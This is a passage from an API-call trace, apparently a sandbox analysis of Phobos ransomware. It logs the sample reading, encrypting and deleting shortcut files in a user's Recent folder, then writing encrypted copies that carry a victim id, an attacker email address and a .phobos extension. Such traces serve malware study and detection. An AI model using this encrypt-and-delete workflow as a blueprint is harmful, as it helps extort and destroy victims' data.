hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.927] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.927] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\lTqEzeGMbsz.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ltqezegmbsz.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0201.186] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0201.186] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.186] ReadFile (in: hFile=0x124, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x2d2, lpOverlapped=0x0) returned 1 [0201.187] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x2e0, dwBufLen=0x2e0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x2e0) returned 1 [0201.187] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x2e0, lpOverlapped=0x0) returned 1 [0201.188] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32868) returned 1 [0201.188] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.188] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0201.188] CryptDestroyKey (hKey=0xa32868) returned 1 [0201.188] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0201.188] CryptDestroyKey (hKey=0xa328e8) returned 1 [0201.188] CloseHandle (hObject=0x124) returned 1 [0201.188] CloseHandle (hObject=0x178) returned 1 [0201.188] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\lTqEzeGMbsz.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ltqezegmbsz.lnk")) returned 1 [0201.189] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0201.189] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\My Videos.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\my videos.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0201.190] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1337) returned 1 [0201.190] CloseHandle (hObject=0x178) returned 1 [0201.190] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\My Videos.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\my videos.lnk")) returned 0x20 [0201.190] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\My Videos.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\my videos.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.190] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\My Videos.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\my videos.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0201.190] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.190] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.190] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\My Videos.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\my videos.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0201.191] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0201.191] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.191] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x539, lpOverlapped=0x0) returned 1 [0201.192] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x540, dwBufLen=0x540 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x540) returned 1 [0201.192] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x540, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x540, lpOverlapped=0x0) returned 1 [0201.193] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32868) returned 1 [0201.193] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.193] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0201.193] CryptDestroyKey (hKey=0xa32868) returned 1 [0201.193] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0201.194] CryptDestroyKey (hKey=0xa328e8) returned 1 [0201.194] CloseHandle (hObject=0x178) returned 1 [0201.194] CloseHandle (hObject=0x124) returned 1 [0201.194] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\My Videos.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\my videos.lnk")) returned 1 [0201.195] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0201.195] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\MY1YRwHW.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\my1yrwhw.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0201.196] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=6788) returned 1 [0201.196] CloseHandle (hObject=0x124) returned 1 [0201.196] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\MY1YRwHW.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\my1yrwhw.lnk")) returned 0x20 [0201.196] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\MY1YRwHW.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\my1yrwhw.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.196] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\MY1YRwHW.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\my1yrwhw.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0201.196] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.196] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.196] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\MY1YRwHW.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\my1yrwhw.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0201.197] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0201.197] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.197] ReadFile (in: hFile=0x124, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x1a84, lpOverlapped=0x0) returned 1 [0201.198] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1a90, dwBufLen=0x1a90 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1a90) returned 1 [0201.198] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x1a90, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x1a90, lpOverlapped=0x0) returned 1 [0201.199] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32868) returned 1 [0201.199] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.199] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0201.199] CryptDestroyKey (hKey=0xa32868) returned 1 [0201.199] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0201.199] CryptDestroyKey (hKey=0xa328e8) returned 1 [0201.200] CloseHandle (hObject=0x124) returned 1 [0201.200] CloseHandle (hObject=0x178) returned 1 [0201.200] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\MY1YRwHW.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\my1yrwhw.lnk")) returned 1 [0201.201] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0201.201] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\n0cbh4dN7_2G5e.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\n0cbh4dn7_2g5e.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0201.202] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=2500) returned 1 [0201.202] CloseHandle (hObject=0x178) returned 1 [0201.202] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\n0cbh4dN7_2G5e.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\n0cbh4dn7_2g5e.lnk")) returned 0x20 [0201.202] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\n0cbh4dN7_2G5e.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\n0cbh4dn7_2g5e.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.202] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\n0cbh4dN7_2G5e.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\n0cbh4dn7_2g5e.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0201.202] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.202] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.202] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\n0cbh4dN7_2G5e.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\n0cbh4dn7_2g5e.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0201.203] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0201.203] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.203] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x9c4, lpOverlapped=0x0) returned 1 [0201.205] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x9d0, dwBufLen=0x9d0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x9d0) returned 1 [0201.205] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x9d0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x9d0, lpOverlapped=0x0) returned 1 [0201.205] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32868) returned 1 [0201.205] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.205] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0201.205] CryptDestroyKey (hKey=0xa32868) returned 1 [0201.205] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0201.206] CryptDestroyKey (hKey=0xa328e8) returned 1 [0201.206] CloseHandle (hObject=0x178) returned 1 [0201.206] CloseHandle (hObject=0x124) returned 1 [0201.206] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\n0cbh4dN7_2G5e.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\n0cbh4dn7_2g5e.lnk")) returned 1 [0201.207] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0201.207] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\NM9OwdEbf-b.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\nm9owdebf-b.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0201.208] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=584) returned 1 [0201.208] CloseHandle (hObject=0x124) returned 1 [0201.208] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\NM9OwdEbf-b.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\nm9owdebf-b.lnk")) returned 0x20 [0201.208] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\NM9OwdEbf-b.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\nm9owdebf-b.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.208] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\NM9OwdEbf-b.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\nm9owdebf-b.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0201.208] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.208] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.208] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\NM9OwdEbf-b.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\nm9owdebf-b.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0201.209] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0201.209] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.209] ReadFile (in: hFile=0x124, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x248, lpOverlapped=0x0) returned 1 [0201.210] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x250, dwBufLen=0x250 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x250) returned 1 [0201.210] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x250, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x250, lpOverlapped=0x0) returned 1 [0201.211] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32868) returned 1 [0201.211] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.211] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0201.211] CryptDestroyKey (hKey=0xa32868) returned 1 [0201.211] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0201.211] CryptDestroyKey (hKey=0xa328e8) returned 1 [0201.211] CloseHandle (hObject=0x124) returned 1 [0201.211] CloseHandle (hObject=0x178) returned 1 [0201.211] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\NM9OwdEbf-b.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\nm9owdebf-b.lnk")) returned 1 [0201.212] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0201.212] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\nRnbeK sd.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\nrnbek sd.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0201.214] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=3871) returned 1 [0201.214] CloseHandle (hObject=0x178) returned 1 [0201.214] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\nRnbeK sd.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\nrnbek sd.lnk")) returned 0x20 [0201.214] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\nRnbeK sd.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\nrnbek sd.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.215] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\nRnbeK sd.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\nrnbek sd.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0201.215] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, 